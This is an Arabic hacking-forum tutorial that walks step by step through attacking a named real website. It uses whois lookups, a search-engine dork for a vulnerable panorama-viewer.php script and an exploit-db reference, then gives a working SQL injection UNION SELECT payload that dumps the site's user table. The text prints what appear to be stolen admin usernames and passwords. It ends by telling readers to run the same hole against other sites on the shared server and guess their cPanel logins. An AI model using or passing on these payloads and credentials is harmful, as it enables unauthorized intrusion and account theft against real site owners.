حصريا : استهداف موقع و اكتشاف ثغرات ثم استخراج السيرفر و المواقع التابعة و استهدافها و استخراج اليوز
الدرس الاول استهداف الموقع و استخراج السيرفر
PHP:
http://mckitchens.com/الموقع المستهدف نستخرج السيرفر من عدة مواقع منها
PHP:
www.whois.net/
www.raynette.fr/services/whois/
whois.domaintools.com/
www.whois.sc/نستعمل موقع هذا احسن لنخرج السيرفر
PHP:
news.netcraft.com/نكتب الموقع علي الشكل التالي
PHP:
mckitchens.comثم نظغط علي raport
السيرفر هو
PHP:
IP address 209.234.251.93 Site rank 201
Country US Nameserver ns1.drudgereport.com
Date first seen April 1997 DNS admin __hostmaster@drudgereport.com
Domain Registrar networksolutions.com Reverse DNS unknown
Organisation Drudge, Matt, PO Box 459ATTN DRUDGEREPORT.COM, care of Network Solutions, Drums, Panama Nameserver Organisation Drudge, Matt, PO Box 459ATTN DRUDGEREPORT.COM, care of Network Solutions, Drums, Panama
PHP:
209.234.251.93الدرس الثاني اكتشاف الثغرات في الموقع
اول شي نروح لل
PHP:
Bing.comنكتب كما موجود للبحث عن الثغرات مع اني كنت اتصفح فلموقع فلقيت سكريبت
PHP:
panorama-viewer.php?id=يعني سنبحث عن ثغرات SQL injection
نكتب شبه دورك
PHP:
inurl:"panorama-viewer.php?id="سنجد كثير مواقع منها موقعنا اي يعني انه مصاب اوكي عملنا كل شي الا الاستغلال
روح لموقع ثغرات نكتب
PHP:
exploit-db.com
PHP:
chercher : inurl:"panorama-viewer.php?id="يعني طلعتلنا الثغرة :tears:
الدرس الثالث اختراق الموقع
اوكي الدورك هنا
PHP:
Google search: inurl:panorama-viewer.php?id=الاستغلال
PHP:
http://server/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,group_concat%28user_name,0x3a,user_pwd%29,5,6+from+mc_users--
[-] http://server/adm/users.php
[-] http://server/adm/panorama_edit.php?id=1
[-] http://server/listimages/shell.phpالموقع المستهدف
PHP:
http://mckitchens.com/panorama-viewer.php?id=1تم الاختراق
PHP:
http://mckitchens.com/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,group_concat%28user_name,0x3a,user_pwd%29,5,6+from+mc_users--معلومات الادمين
PHP:
JOHNZ3CABN:MCKMIS89A3F,GINNYUZ3R:*P255W0RD407الدرس الرابع استخراج مواقع السيرفر
PHP:
http://www.yougetsignal.com/tools/web-sites-on-web-server/الموقع يخرج مواقع السيرفر و انت طبق عليهم الثفرة
ثم نفتح الnotepad
نضع المواقع و نحذف منها com net org etc
نسجل الملف تيكست نصي ونفتحه بالmicrosoft accés
نضع الموشر في الثمانين
مبروك عليك اليوزرات :msn-wink::msn-wink: ثم خمن علي السي بانل لوول
تحياتي لكم يا عناكب
